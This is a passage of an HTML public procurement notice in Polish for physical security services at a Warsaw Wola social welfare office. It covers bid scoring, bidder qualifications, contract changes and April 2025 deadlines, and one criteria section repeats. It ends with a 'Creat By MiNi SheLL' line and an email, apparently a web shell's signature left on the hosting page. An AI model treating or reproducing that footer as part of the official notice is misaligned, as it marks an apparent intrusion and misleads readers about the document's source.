Formularzu Ofertowym ilu pracowników, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej w obiektach użyteczności publicznej, zostanie skierowanych do realizacji zamówienia, Zamawiający przyzna <br/>0 punktów w tym kryterium.<br/>Wykonawca będzie zobowiązany do zapewnienia, przez cały okres realizacji zamówienia kwalifikowanych pracowników ochrony o doświadczeniu umożliwiającym zdobycie takiej samej ilości punktów, jakie otrzymał podczas przyznawania punktów w kryteriach oceny ofert.<br/>3)	Łączna liczba punktów.<br/>Ł = C + D<br/>gdzie:<br/>Ł - Łączna liczba punktów badanej oferty,<br/>C - liczba punktów jakie otrzyma badana oferta w kryterium cena,<br/>D - liczba punktów jakie otrzyma badana oferta w kryterium doświadczenie pracowników ochrony.<br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczeniezawodowe osób wyznaczonych przez Wykonawcę do realizacji zamówienia – kwalifikowani pracownicy ochrony</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług ochrony fizycznej osób i mienia na rzecz Ośrodka Pomocy Społecznej Dzielnicy Wola m.st. Warszawy,<br/>realizowanych w siedzibie Działu Pomocy Osobom w Kryzysie Bezdomności (zwanym dalej „DPB”) oraz Działu Pracy<br/>Socjalnej i Programów Społecznych (zwanym dalej „DPSPS”) przy ul. Karolkowej 58 A w Warszawie – budynek<br/>jednokondygnacyjny, o powierzchni parteru 356 m2 oraz piwnica. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-05-13 do 2027-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Do 50% wartości zamówienia pierwotnego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty, każda część przedmiotu zamówienia będzie oceniana oddzielnie. Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena („C”) – waga kryterium 60%;<br/>2) Doświadczenie zawodowe osób wyznaczonych przez Wykonawcę do realizacji zamówienia – kwalifikowani pracownicy ochrony („D”) – waga kryterium 40%<br/>Doświadczenie zawodowe kwalifikowanego pracownika ochrony będzie punktowane następująco:<br/>Część I przedmiotu zamówienia:<br/>1)	skierowanie do realizacji usług 1 pracownika kwalifikowanego, posiadającego <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 5 punktów.<br/>2)	skierowanie do realizacji usług 2 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 10 punktów.<br/>3)	skierowanie do realizacji usług 3 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 20 punktów.<br/>4)	skierowanie do realizacji usług 4 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 30 punktów.<br/>5)	skierowanie do realizacji usług 5 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 40 punktów.<br/>Część II przedmiotu zamówienia:<br/>1)	skierowanie do realizacji usług 1 pracownika kwalifikowanego, posiadającego <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 15 punktów.<br/>2)	skierowanie do realizacji usług 2 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 25 punktów.<br/>3)	skierowanie do realizacji usług 3 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 40 punktów.<br/>Część III przedmiotu zamówienia: <br/>1)	skierowanie do realizacji usług 1 pracownika kwalifikowanego, posiadającego <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 20 punktów. <br/>2)	kierowanie do realizacji usług 2 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 40 punktów. <br/>Jeżeli Wykonawca nie zadeklaruje w Formularzu Ofertowym ilu pracowników, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej w obiektach użyteczności publicznej, zostanie skierowanych do realizacji zamówienia, Zamawiający przyzna <br/>0 punktów w tym kryterium.<br/>Wykonawca będzie zobowiązany do zapewnienia, przez cały okres realizacji zamówienia kwalifikowanych pracowników ochrony o doświadczeniu umożliwiającym zdobycie takiej samej ilości punktów, jakie otrzymał podczas przyznawania punktów w kryteriach oceny ofert.<br/>3)	Łączna liczba punktów.<br/>Ł = C + D<br/>gdzie:<br/>Ł - Łączna liczba punktów badanej oferty,<br/>C - liczba punktów jakie otrzyma badana oferta w kryterium cena,<br/>D - liczba punktów jakie otrzyma badana oferta w kryterium doświadczenie pracowników ochrony.<br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczeniezawodowe osób wyznaczonych przez Wykonawcę do realizacji zamówienia – kwalifikowani pracownicy ochrony</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca, zobowiązany jest do posiadania uprawnień do wykonywania działalności gospodarczej w zakresie świadczenia<br/>usług ochroniarskich zgodnie z art. 15 ust. 1 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2021 r.,<br/>poz. 1995).<br/>Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o braku podstaw do<br/>wykluczenia oraz spełnianiu warunków udziału w postępowaniu (stanowiące Załącznik nr 1 do SWZ).<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Wykonawca, zobowiązany jest do posiadania ubezpieczenia od odpowiedzialności cywilnej (OC) w zakresie prowadzonej<br/>działalności, związanej z przedmiotem niniejszego zamówienia, na kwotę nie niższą niż 500.000,00 zł w stosunku do Części<br/>I przedmiotu zamówienia oraz 150.000,00 zł w stosunku do części II przedmiotu zamówienia i 250.000,00 zł. w stosunku do<br/>części III przedmiotu zamówienia. Wykonawca składający ofertę na I i II lub III część przedmiotu zamówienia powinien<br/>dysponować polisą OC na kwotę nie niższą niż 500.000,00 zł. Wykonawca składający ofertę na II i III część przedmiotu<br/>zamówienia powinien dysponować polisą OC na kwotę nie niższą niż 250.000,00 zł.<br/>Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o braku podstaw do<br/>wykluczenia oraz spełnianiu warunków udziału w postępowaniu (stanowiące Załącznik nr 1 do SWZ).<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli:<br/>a) w okresie ostatnich trzech lat przed upływem terminu składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej 2 zamówienia (2 odrębne umowy)<br/>polegające na świadczeniu usługi ochrony fizycznej osób i mienia wykonywane przez okres co najmniej 12 miesięcy każde<br/>(dotyczący każdej części przedmiotu zamówienia).<br/>Uwaga: Jeżeli Wykonawca składa ofertę na więcej niż jedna część przedmiotu zamówienia (maksymalnie 2 części), na spełnianie warunku przedstawi doświadczenie, o którym mowa pod lit. a).<br/>Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o braku podstaw do<br/>wykluczenia oraz spełnianiu warunków udziału w postępowaniu (stanowiące Załącznik nr 1 do SWZ).<br/>b) dysponuje lub będzie dysponował osobami, które skieruje do realizacji zamówienia, zdolnymi do jego wykonania, tj.<br/>zespołem składającym się z osób, posiadających następujące kwalifikacje:<br/>• kwalifikowanymi pracownikami ochrony fizycznej przeszkolonymi w zakresie pełnionych obowiązków, sprawni fizycznie i<br/>intelektualnie, niekarani, posiadający umiejętność nawiązywania prawidłowych relacji interpersonalnych zgodnych z<br/>podstawowymi zasadami kultury,<br/>posiadającymi co najmniej 2 - letnie doświadczenie w wykonywaniu usług ochrony fizycznej w obiektach użyteczności<br/>publicznej (recepcje biur, urzędów), wpisanymi na listę pracowników kwalifikowanych - art. 28 ust. 2 pkt 1 ustawy z dnia 22<br/>sierpnia 1997 r. o ochronie osób i mienia<br/>(Dz.U. z 2021 r., poz. 1995 z późn. zm.),<br/>• Koordynatorem/kierownikiem ochrony – przeszkolonym w zakresie pełnionych obowiązków, co najmniej 3 - letnie<br/>doświadczenie w kierowaniu ochroną fizyczną w obiektach użyteczności publicznej (biura, urzędy).<br/>W odniesieniu do Części I przedmiotu zamówienia zespół składa się co najmniej z 6 osób – 1 koordynatora usług i 5<br/>kwalifikowanymi pracownikami ochrony, spełniającymi warunki, o których mowa powyżej.<br/>W odniesieniu do Części II przedmiotu zamówienia zespół składa się co najmniej z 4 osób – 1 koordynatora usług i 3<br/>kwalifikowanych pracowników ochrony, spełniających warunki, o których mowa powyżej.<br/>W odniesieniu do Części III przedmiotu zamówienia zespół składa się co najmniej z 3 osób – 1 koordynatora usług i 2<br/>kwalifikowanych pracowników ochrony, spełniających warunki, o których mowa powyżej.<br/>W przypadku złożenia oferty na więcej niż jedna część przedmiotu zamówienia (maksymalnie 2 części), jest wymagany<br/>minimum 1 koordynator do realizacji zamówienia.<br/>Spełnienie wyżej wymienionego warunku będzie oceniane na podstawie Oświadczenia Wykonawcy o braku podstaw do<br/>wykluczenia oraz spełnianiu warunków udziału<br/>w postępowaniu (stanowiące Załącznik nr 1 do SWZ);<br/>c) dysponuje wyposażeniem dla pracowników ochrony (według opisu przedmiotu zamówienia) oraz grupą interwencyjną.<br/>Spełnienie wyżej wymienionego warunku będzie oceniane na podstawie Oświadczenia Wykonawcy o braku podstaw do<br/>wykluczenia oraz spełnianiu warunków udziału w postępowaniu (stanowiące Załącznik nr 1 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp –<br/>Załącznik nr 2 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy. Wzór Oświadczenia Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia stanowi Załącznik nr 6 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania oraz spełnienie warunków<br/>udział w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 5A, 5B i/lub 5C do SWZ (w zależności do części, której dotyczy) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-16 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-16 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com